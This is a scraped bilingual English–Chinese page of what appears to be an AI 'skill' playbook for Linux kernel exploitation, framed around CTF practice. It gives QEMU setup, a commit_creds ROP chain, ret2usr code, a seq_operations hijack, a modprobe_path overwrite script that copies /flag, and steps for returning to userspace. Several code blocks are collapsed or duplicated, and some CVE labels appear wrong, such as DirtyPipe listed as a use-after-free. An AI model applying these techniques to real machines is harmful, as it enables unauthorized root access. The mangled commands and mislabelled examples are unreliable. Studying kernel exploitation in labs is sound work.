kernel-exploitation

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Linux Kernel Exploitation — Expert Attack Playbook

SKILL: Linux Kernel Exploitation — 专家级攻击手册

AI LOAD INSTRUCTION: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI.

AI加载说明：专家级内核漏洞利用技术，涵盖环境搭建（QEMU）、漏洞类型、提权目标、内核ROP、ret2usr、栈迁移、跨缓存攻击。内容提炼自ctf-wiki内核模式章节和真实世界内核CVE。基础大模型通常会混淆用户态和内核态的漏洞利用约束，尤其是SMEP/SMAP/KPTI相关的约束。

0. RELATED ROUTING

0. 相关跳转链接

binary-protection-bypass — userspace protections (NX, ASLR) also apply in kernel context
stack-overflow-and-rop — kernel ROP reuses many userspace ROP concepts
heap-exploitation — kernel SLUB is conceptually related to userspace heap
linux-privilege-escalation — non-exploit kernel privesc techniques

二进制防护绕过 —— 用户空间防护（NX、ASLR）同样适用于内核上下文
栈溢出与ROP —— 内核ROP复用了大量用户空间ROP的概念
堆漏洞利用 —— 内核SLUB在概念上与用户空间堆相关
Linux权限提升 —— 非漏洞利用类的内核提权技术

Advanced References

高级参考资料

KERNEL_MITIGATION_BYPASS.md — KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques
KERNEL_HEAP_TECHNIQUES.md — SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation

KERNEL_MITIGATION_BYPASS.md —— KASLR、SMEP、SMAP、KPTI、FG-KASLR、CFI绕过技术
KERNEL_HEAP_TECHNIQUES.md —— SLUB内部原理、跨缓存攻击、msg_msg/pipe_buffer/sk_buff漏洞利用

1. EXPLOITATION MODEL

1. 漏洞利用模型

┌─────────────────────────────────────────────────────┐
│  1. Find Vulnerability                              │
│     (UAF, OOB, race, integer overflow, type confusion)│
├─────────────────────────────────────────────────────┤
│  2. Build Primitive                                 │
│     (arbitrary read, arbitrary write, controlled RIP)│
├─────────────────────────────────────────────────────┤
│  3. Bypass Mitigations                              │
│     (KASLR, SMEP, SMAP, KPTI)                     │
├─────────────────────────────────────────────────────┤
│  4. Escalate Privileges                             │
│     (commit_creds, modprobe_path, namespace escape)  │
├─────────────────────────────────────────────────────┤
│  5. Return to Userspace Cleanly                     │
│     (KPTI trampoline, iretq/sysretq, swapgs)       │
└─────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────┐
│  1. 发现漏洞                              │
│     (UAF, OOB, 竞态, 整数溢出, 类型混淆)│
├─────────────────────────────────────────────────────┤
│  2. 构建利用原语                                 │
│     (任意读, 任意写, RIP可控)│
├─────────────────────────────────────────────────────┤
│  3. 绕过防护机制                              │
│     (KASLR, SMEP, SMAP, KPTI)                     │
├─────────────────────────────────────────────────────┤
│  4. 权限提升                             │
│     (commit_creds, modprobe_path, 命名空间逃逸)  │
├─────────────────────────────────────────────────────┤
│  5. 正常返回用户空间                     │
│     (KPTI跳板, iretq/sysretq, swapgs)       │
└─────────────────────────────────────────────────────┘

2. ENVIRONMENT SETUP

2. 环境搭建

QEMU + Custom Kernel

QEMU + 自定义内核

bash

undefined

bash

undefined

Download and compile kernel

wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz tar xf linux-6.1.tar.xz && cd linux-6.1 make defconfig

Disable mitigations for easier debugging:

scripts/config --disable RANDOMIZE_BASE # KASLR scripts/config --disable RANDOMIZE_LAYOUT # FG-KASLR scripts/config --enable DEBUG_INFO make -j$(nproc)

Boot with QEMU

qemu-system-x86_64
-kernel bzImage
-initrd rootfs.cpio.gz
-append "console=ttyS0 nokaslr quiet"
-nographic
-s -S \ # GDB server on :1234, pause at start -monitor /dev/null
-m 256M
-cpu kvm64,+smep,+smap

undefined

undefined

GDB Debugging

GDB调试

bash

gdb vmlinux
target remote :1234

bash

gdb vmlinux
target remote :1234

Load kernel symbols

add-symbol-file vmlinux 0xffffffff81000000 # typical .text base

Breakpoints

b commit_creds b *0xffffffff81234567

pwndbg/GEF work with kernel debugging

undefined

undefined

initramfs Modification

initramfs修改

bash

mkdir rootfs && cd rootfs
cpio -idmv < ../rootfs.cpio.gz

bash

mkdir rootfs && cd rootfs
cpio -idmv < ../rootfs.cpio.gz

Edit init script, add exploit binary

cp /path/to/exploit ./

Repack

find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz

---

find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz

---

3. COMMON VULNERABILITY TYPES

3. 常见漏洞类型

Type	Description	Kernel Example
UAF	Object freed but pointer still accessible	CVE-2022-0847 (DirtyPipe)
OOB Read/Write	Array index or size check missing	CVE-2021-22555 (Netfilter)
Race Condition	TOCTOU between check and use	CVE-2016-5195 (DirtyCow)
Integer Overflow	Size calculation wraps around	Various ioctl handlers
Type Confusion	Object cast to wrong type	CVE-2023-0179 (Netfilter)
Double Free	Object freed twice	SLUB allocator exploitation
Stack Overflow	Kernel stack buffer overflow	Rare (kernel stack is small: 8KB–16KB)

类型	描述	内核示例
UAF	对象被释放但指针仍然可访问	CVE-2022-0847 (DirtyPipe)
OOB Read/Write	缺少数组索引或大小校验	CVE-2021-22555 (Netfilter)
Race Condition	检查与使用之间存在TOCTOU	CVE-2016-5195 (DirtyCow)
Integer Overflow	大小计算出现回绕	各类ioctl处理逻辑
Type Confusion	对象被强制转换为错误类型	CVE-2023-0179 (Netfilter)
Double Free	对象被重复释放	SLUB分配器漏洞利用
Stack Overflow	内核栈缓冲区溢出	罕见（内核栈很小：8KB–16KB）

4. PRIVILEGE ESCALATION TARGETS

4. 提权目标方式

Method 1: commit_creds(prepare_kernel_cred(0))

方法1: commit_creds(prepare_kernel_cred(0))

// Kernel function that sets current process credentials to root
void (*commit_creds)(void *) = COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = PREPARE_KERNEL_CRED_ADDR;
commit_creds(prepare_kernel_cred(0));  // cred with uid=0, gid=0

Kernel ROP chain equivalent:

pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) = init_cred
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace

// Kernel function that sets current process credentials to root
void (*commit_creds)(void *) = COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = PREPARE_KERNEL_CRED_ADDR;
commit_creds(prepare_kernel_cred(0));  // cred with uid=0, gid=0

内核ROP链等价实现:

pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) = init_cred
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace

Method 2: modprobe_path Overwrite

方法2: modprobe_path覆写

// modprobe_path = "/sbin/modprobe" in kernel .data
// Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root

bash

undefined

// modprobe_path = "/sbin/modprobe" in kernel .data
// Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root

bash

undefined

Setup:

echo '#!/bin/sh' > /tmp/x echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x chmod +x /tmp/x

Trigger (unknown binary format):

echo -ne '\xff\xff\xff\xff' > /tmp/dummy chmod +x /tmp/dummy /tmp/dummy # kernel calls modprobe_path → /tmp/x runs as root

undefined

echo -ne '\xff\xff\xff\xff' > /tmp/dummy chmod +x /tmp/dummy /tmp/dummy # kernel calls modprobe_path → /tmp/x runs as root

undefined

Method 3: cred Structure Direct Overwrite

方法3: 直接覆写cred结构

If you can find the current task's

cred

pointer and have arbitrary write, directly zero out uid/gid fields in the cred structure.

如果你能找到当前任务的

cred

指针且具备任意写权限，可以直接将cred结构中的uid/gid字段清零。

Method 4: Namespace Escape (Containers)

方法4: 命名空间逃逸（容器场景）

Overwrite

init_nsproxy

or manipulate namespace pointers to escape container isolation.

覆写

init_nsproxy

或操纵命名空间指针以绕过容器隔离。

5. KERNEL ROP

5. 内核ROP

Controlled RIP Sources

可控RIP来源

Source	Mechanism
Corrupted function pointer	UAF object has vtable-like dispatch → overwrite pointer
Corrupted return address	Kernel stack overflow (rare)
Corrupted `ops` structure	Module operations struct (file_operations, seq_operations)

来源	机制
被破坏的函数指针	UAF对象存在类vtable调度逻辑 → 覆写指针
被破坏的返回地址	内核栈溢出（罕见）
被破坏的 `ops` 结构	模块操作结构体（file_operations, seq_operations）

seq_operations Hijack (Common CTF Pattern)

seq_operations劫持（常见CTF模式）

struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int (*show)(struct seq_file *, void *);
};
// Size: 0x20 (fits in kmalloc-32)
// Open /proc/self/stat → allocates seq_operations
// UAF overwrite start → controlled RIP when read() is called

struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int (*show)(struct seq_file *, void *);
};
// Size: 0x20 (fits in kmalloc-32)
// Open /proc/self/stat → allocates seq_operations
// UAF overwrite start → controlled RIP when read() is called

Stack Pivoting in Kernel

内核栈迁移

Gadget	Usage
`xchg eax, esp; ret`	Pivot to address in lower 32 bits of RAX (mmap buffer at known addr)
`mov rsp, [rdi+X]; ...`	If RDI points to controlled data
`push rdi; pop rsp; ...`	Pivot to RDI (first arg of hijacked function)

Important: After SMEP, cannot execute userspace code. ROP chain must use kernel gadgets only.

Gadget	用法
`xchg eax, esp; ret`	迁移到RAX低32位对应的地址（已知地址的mmap缓冲区）
`mov rsp, [rdi+X]; ...`	若RDI指向受控数据时使用
`push rdi; pop rsp; ...`	迁移到RDI指向地址（被劫持函数的第一个参数）

重要提示: 开启SMEP后，无法执行用户空间代码，ROP链只能使用内核gadget。

6. ret2usr (Pre-SMEP)

6. ret2usr（SMEP出现前技术）

Directly call a userspace function from kernel context:

void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory

Blocked by: SMEP (Supervisor Mode Execution Prevention) — kernel cannot execute user-mapped pages.

从内核上下文直接调用用户空间函数:

void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory

被以下机制阻断: SMEP（监管模式执行保护）—— 内核无法执行用户映射的页面。

7. RETURNING TO USERSPACE

7. 返回用户空间

After privilege escalation in kernel, must return cleanly to userspace to get a root shell.

在内核中完成提权后，必须正常返回用户空间才能获取root shell。

Via iretq (Traditional)

通过iretq（传统方式）

nasm

; ROP chain ending:
swapgs                     ; swap GS base back to userspace
iretq                      ; pops: RIP, CS, RFLAGS, RSP, SS from stack
; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]

python

undefined

nasm

; ROP chain ending:
swapgs                     ; swap GS base back to userspace
iretq                      ; pops: RIP, CS, RFLAGS, RSP, SS from stack
; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]

python

undefined

Save userspace state before entering kernel

user_cs = 0x33 user_ss = 0x2b user_rflags = # saved via pushfq before exploit user_rsp = # saved RSP user_rip = # address of post-exploit function (e.g., get_shell)

undefined

user_cs = 0x33 user_ss = 0x2b user_rflags = # saved via pushfq before exploit user_rsp = # saved RSP user_rip = # address of post-exploit function (e.g., get_shell)

undefined

Via KPTI Trampoline (When KPTI Enabled)

通过KPTI Trampoline（开启KPTI时）

KPTI separates kernel/user page tables. Direct

swapgs; iretq

crashes because user pages aren't mapped. Use the kernel's own return trampoline:

undefined

KPTI会隔离内核/用户页表，直接执行

swapgs; iretq

会崩溃，因为用户页未映射，使用内核自带的返回跳板:

undefined

KPTI trampoline (in kernel at known offset):

swapgs_restore_regs_and_return_to_usermode:

mov rdi, rsp

...

swapgs

iretq

Jump to trampoline with [RIP, CS, RFLAGS, RSP, SS] on stack

undefined

undefined

Via signal Handler Return

通过信号处理函数返回

Set up a signal handler before exploit. After

commit_creds

, trigger the signal → return to userspace via signal handler (avoids manual swapgs/iretq).

在漏洞利用前设置好信号处理函数，执行完

commit_creds

后触发信号 → 通过信号处理函数返回用户空间（无需手动处理swapgs/iretq）。

8. QEMU DEBUGGING TIPS

8. QEMU调试技巧

Command	Purpose
`-s -S`	GDB server on :1234, paused
`-monitor /dev/null`	Disable QEMU monitor (cleaner output)
`-append "nokaslr"`	Disable KASLR for debugging
`-cpu kvm64,+smep,+smap`	Enable specific CPU features
`info registers` (GDB)	Show all register values
`maintenance packet Qqemu.PhyMemMode:1`	Read physical memory in GDB
`cat /proc/kallsyms`	Kernel symbol addresses (if readable)
`cat /sys/kernel/notes`	Kernel build ID

命令	用途
`-s -S`	在1234端口启动GDB服务器，启动时暂停执行
`-monitor /dev/null`	禁用QEMU monitor（输出更整洁）
`-append "nokaslr"`	禁用KASLR便于调试
`-cpu kvm64,+smep,+smap`	开启指定CPU特性
`info registers` (GDB)	显示所有寄存器值
`maintenance packet Qqemu.PhyMemMode:1`	允许GDB读取物理内存
`cat /proc/kallsyms`	内核符号地址（如果可读）
`cat /sys/kernel/notes`	内核构建ID

9. DECISION TREE

9. 利用决策树

Kernel vulnerability identified
├── What type?
│   ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES)
│   ├── OOB → determine read/write range, target adjacent objects
│   ├── Race condition → reliable trigger (userfaultfd, FUSE)
│   ├── Integer overflow → how does it translate to OOB or allocation confusion?
│   └── Type confusion → what can the confused type access?
│
├── Build primitive
│   ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP)
│   ├── Arbitrary read? → leak KASLR base, then controlled RIP
│   ├── Arbitrary write? → modprobe_path overwrite (simplest)
│   │                      or overwrite cred structure directly
│   └── Limited write? → target function pointer in known object
│
├── Mitigations (see KERNEL_MITIGATION_BYPASS.md)
│   ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read)
│   ├── SMEP → kernel ROP only (no user code exec)
│   ├── SMAP → cannot read user data from kernel (use copy_from_user gadget)
│   ├── KPTI → use KPTI trampoline for clean return
│   └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path)
│
├── Escalation method
│   ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds
│   ├── Have arbitrary write only → modprobe_path overwrite
│   ├── Have arbitrary write + KASLR bypass → overwrite cred uid/gid to 0
│   └── Have controlled function call → call commit_creds(prepare_kernel_cred(0))
│
└── Return to userspace
    ├── KPTI disabled → swapgs; iretq (ROP ending)
    ├── KPTI enabled → jump to KPTI trampoline
    └── Alternative → signal handler + process_one_work return path

已识别内核漏洞
├── 漏洞类型？
│   ├── UAF → 识别被释放对象，喷射替换对象（参考KERNEL_HEAP_TECHNIQUES）
│   ├── OOB → 确定读写范围，目标相邻对象
│   ├── 竞态条件 → 实现可靠触发（userfaultfd, FUSE）
│   ├── 整数溢出 → 如何转换为OOB或分配逻辑混淆？
│   └── 类型混淆 → 被混淆类型可访问哪些资源？
│
├── 构建利用原语
│   ├── RIP可控？ → 内核ROP或ret2usr（无SMEP时）
│   ├── 任意读权限？ → 泄露KASLR基地址，再实现RIP可控
│   ├── 任意写权限？ → modprobe_path覆写（最简单）
│   │                      或直接覆写cred结构
│   └── 有限写权限？ → 目标为已知对象中的函数指针
│
├── 防护机制（参考KERNEL_MITIGATION_BYPASS.md）
│   ├── KASLR → 首先需要信息泄露（可读时用/proc/kallsyms、时序攻击或OOB读）
│   ├── SMEP → 仅使用内核ROP（禁止执行用户代码）
│   ├── SMAP → 内核无法直接读取用户数据（使用copy_from_user gadget）
│   ├── KPTI → 使用KPTI跳板实现正常返回
│   └── FG-KASLR → 函数偏移随机化（使用数据段目标如modprobe_path）
│
├── 提权方法
│   ├── RIP可控 + 绕过KASLR → ROP链: prepare_kernel_cred(0) → commit_creds
│   ├── 仅具备任意写权限 → modprobe_path覆写
│   ├── 任意写权限 + 绕过KASLR → 覆写cred的uid/gid为0
│   └── 可控函数调用 → 调用commit_creds(prepare_kernel_cred(0))
│
└── 返回用户空间
    ├── KPTI关闭 → swapgs; iretq（ROP结尾）
    ├── KPTI开启 → 跳转到KPTI跳板
    └── 替代方案 → 信号处理函数 + process_one_work返回路径